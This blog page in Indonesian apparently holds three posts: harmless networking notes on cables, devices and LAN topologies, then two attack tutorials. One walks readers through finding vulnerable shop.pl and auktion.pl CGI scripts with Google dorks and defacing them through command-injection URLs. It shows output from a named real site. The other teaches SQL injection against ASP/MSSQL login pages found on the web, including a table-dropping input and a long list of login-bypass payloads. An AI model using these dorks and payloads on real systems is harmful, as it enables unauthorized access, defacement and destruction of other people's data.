•Kecepatan pengiriman data lebih tinggi di banding Twisted Pair, 30 Mbps
•Harga yang relatif tidak mahal
•Ukurannya lebih besar dari Twisted Pair

3.Kabel Fiber Optic
•Jarak yang jauh
•Kecepatan data yang tinggi, 100 Mbps
•Ukuran yang relatif kecil
•Sulit dipengaruhi gangguan
•Harga yang relatif masih mahal
•Instalasi yang relatif sulit


•Network Interface Card (NIC)
-----------------------------
Suatu workstation tidak dihubungkan secara langsung dengan kabel jaringan
ataupun tranceiver cable, tetapi melalui suatu rangkaian elektronika yang
dirancang khusus untuk menangani network protocol yang dikenal dengan
Network Interface Card (NIC).

•Network Software
-----------------
Tanpa adanya software jaringan maka jaringan tersebut tidak akan bekerja
sebagaimana yang dikehendaki. Software ini juga yang memungkinkan sistem
komputer yang satu berkomunikasi dengan sistem komputer yang lain.

Peralatan Pendukung LAN
=======================

a.Repeater
------------
•Pada OSI, bekerja pada lapisan Physical
•Meneruskan dan memperkuat sinyal
•Banyak digunakan pada topologi Bus
•Penggunaannya mudah dan Harga yang relatif murah
•Tidak memiliki pengetahuan tentang alamat tujuan sehingga penyampaian
data secara broadcast
•Hanya memiliki satu domain collision sehingga bila salah satu port sibuk
maka port-port yang lain harus menunggu.

b.Hub
-----
•Bekerja pada lapisan Physical
•Meneruskan sinyal
•Tidak memiliki pengetahuan tentang alamat tujuan
•Penggunaannya relatif mudah dan harga yang terjangkau
•Hanya memiliki satu buah domain collision

c.Bridge
--------
•Bekerja di lapisan Data Link
•Telah menggunakan alamat-alamat untuk meneruskan data ke tujuannya
•Secara otomatis membuat tabel penterjemah untuk diterima masing2 port

d.Switch
--------
•Bekerja di lapisan Data Link
•Setiap port didalam swith memiliki domain collision sendiri-sendiri
•Memiliki tabel penterjemah pusat yang memiliki daftar penterjemah untuk
semua port
•Memungkinkan transmisi secara full duflex (dua arah)

e.Router
--------
•Router berfungsi menyaring atau memfilter lalu lintas data
•Menentukan dan memilih jalur alternatif yang akan dilalui oleh data
•Menghubungkan antar jaringan LAN, bahkan dengan WAN

Topologi LAN
=============

Pengertian topologi Jaringan adalah susunan lintasan aliran data didalam
jaringan yang secara fisik menghubungkan simpul yang satu dengan simpul
lainnya. Berikut ini adalah beberapa topologi jaringan yang ada dan
dipakai hingga saat ini, yaitu:
•Topologi Star
Beberapa simpul/node dihubungkan dengan simpul pusat/host, yang membentuk
jaringan fisik seperti bintang, semua komunikasi ditangani langsung dan
dikelola oleh host yang berupa mainframe komputer.


[PC1]
|
[PC2]-------[Server]---------[PC3]
/ \
/ \
[PC4] [PC5]




•Topologi Hierarkis
Berbentuk seperti pohon bercabang yang terdiri dari komputer induk(host)
dihubungkan dengan simpul/node lain secara berjenjang. Jenjang yang lebih
tinggi berfungsi sebagai pengatur kerja jenjang dibawahnya.

[Server]
/ \
[server/PC] [server/PC]
/ \ / \
/ \ / \
[PC1] [PC2] [PC3] [PC4]



•Topologi Bus
Beberapa simpul/node dihubungkan dengan jalur data (bus). Masing2 node
dapat melakukan tugas-tugas dan operasi yangberbeda namun semua mempunyai
hierarki yang sama.



[PC1] [PC2] [PC3] [PC4]
| | | |
=backbone================================
| | | |
[PC1] [PC2] [PC3] [PC4]


•Topologi Loop
Merupakan hubungan antar simpul/node secara serial dalam bentuk suatu
lingkaran tertutup. Dalam bentuk ini tak ada central node/host, semua
mempunyai hierarki yang sama.


[PC1]
[PC2] | [PC3]
\|/
(_) <== lingkaran
/ \
[PC4][PC5]



•Topologi Ring
Bentuk ini merupakan gabungan bentuk topologi loop dan bus, jika salah
satu simpul/node rusak, maka tidak akan mempengaruhi komunikasi node
yang lain karena terpisah dari jalur data.



[PC1a]
[PC1b]__|__[PC1c] << bus
|
[PC2]|[PC3] < \ | /
(_) <== lingkaran
/ \
[PC4][PC5]



•Topologi Web
Merupakan bentuk topologi yang masing-masing simpul/node dalam jaringan
dapat saling berhubungan dengan node lainnya melalui beberapa link.
Suatu bentuk web network dengan n node, akan menggunakan link sebanyak
n(n-1)/2.


[PC1]
/ / \ \
[PC2]=-+---+=[PC3]
| / \ |
[PC4]=-------=[PC5]




Dengan menggunakan segala kelebihan dan kekurangan masing2 konfigurasi,
memungkinkan dikembangkannya suatu konfigurasi baru yang menggabungkan
beberapa topologi disertai teknologi baru agar kondisi ideal suatu
sistem jaringan dapat terpenuhi.
Diposting oleh di Tidak ada komentar:

bug bug dek shop pl

1. Shop.pl Bug

Bug ini seperti pada cpanel, and go bug. Lanjut ajah udah pernah koq!!

a. cari target di seach engine google sementara belum ada yang mengalahkan
xixixi :=)

allinurl:shop.pl/page=

Nah tu kan ada nggak?? Klo ada langsung aja sikat

b. Tambahkan di web brosermu sebagai berikut :

http://HOST/CGI_DIRECTORY/shop.pl/page=|ls|

Jika hal in menunjukan list directory maka itu adalah sasaran.

c. Deface kok terus, jangan dilakukan in hanya sebagai pengetahuan klean aja:

http://HOST/CGI_DIRECTORY/shop.pl/page=|echo j***cuk by Satria>file.txt|



Note : file.txt adalah file deface dalam bentuk txt



2. Auktion.pl Bug

Langkah-langkah :

a. Lelah aku nulisnya sama dengan atas cari di google

allinurl:auktion.pl?menue=

Klo ketemu target lanjut

b. Coba sekarang tambahkan ini

http://[VICTIM]/cgi-bin/auktion.pl?menue=|ID|

Klo tag in menunjukkan hal aneh (apanya liat aja ndiri), maka lanjutkan
ke langkah berikutnya

Jika hal ini tidak mengubah tampilan maka ya cari target lain.

c. Deface !!

Dengan perintah echo yang sangat populer dan lawas sekali (xixixi)

http://[VICTIM]/cgi-bin/auktion.pl?menue=|echo Defaced by Satria>file.txt|

Contoh :

http://www.1000steine.de/cgi-bin/auktion.pl?menue=;id|

uid=112(100steineftp) gid=100(users) groups=100(users),111(site-adm),113(site2)

nah tu kan.

Lanjut

http://www.1000steine.de/cgi-bin/auktion.pl?menue=;uname%20-a|

Linux lagoon1.ipberlin.com 2.2.16C28_III #1 Mon Jul 30 22:07:58 PDT 2001 i586 unknown



Thank`s buat Kamesywara yang telah memberi ijin buat saya ambil nih artikelnya.

dan all my friends yang nggak bisa saya sebutkan.

peace indonesiaku

Viva IT Indonesia
Diposting oleh di Tidak ada komentar:

Dasar dasar sql

Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan
kenapa bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan
beberapa sql injection pada url.
Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut ,
sekarang kita mulai aja dengan dasar-dasar sql injection :d.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = 'echo' and password='password'
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out'
dari delimiter nya SQL Jadi kalau misal ada inputan
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D
oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya 'login' dan 'pass'. dan
SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)

pasti ke drop tuh table users
Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas :P kita langsung praktek aja>
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
admin\login.asp.
Kalau udah dapet masukin nich variable sql nya

user:admin
pass:' or 1=1--

Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:' or 1=1--
admin:' or 1=1--

Mas , ga bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa
buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter
pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test'1=1--
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target
lalu kita tamhankan hidden field pada source tersebut sebagai contoh :



Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.
ingat script ini ditamhakna pd script yg sudah kalian download dr target .

Variable ' or 1=1--
Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh
pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .
Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory='laptop'
lalu apa hub dengan 'or 1=1---
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop'or 1=1--
Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan
Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan
kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan
mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page
Kita bisa masuk kedalam login page tanpa password dan user name :d.
Kemungkinan-kemungkinan variable lainya :
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection
dan untuk artikel akan dimasukan dalam ezine 3 echo.or.id .Semoga artikel ini berguna .

by : the_day ;the_day@echo.or.id
Diposting oleh di Tidak ada komentar:
Langganan: Komentar (Atom)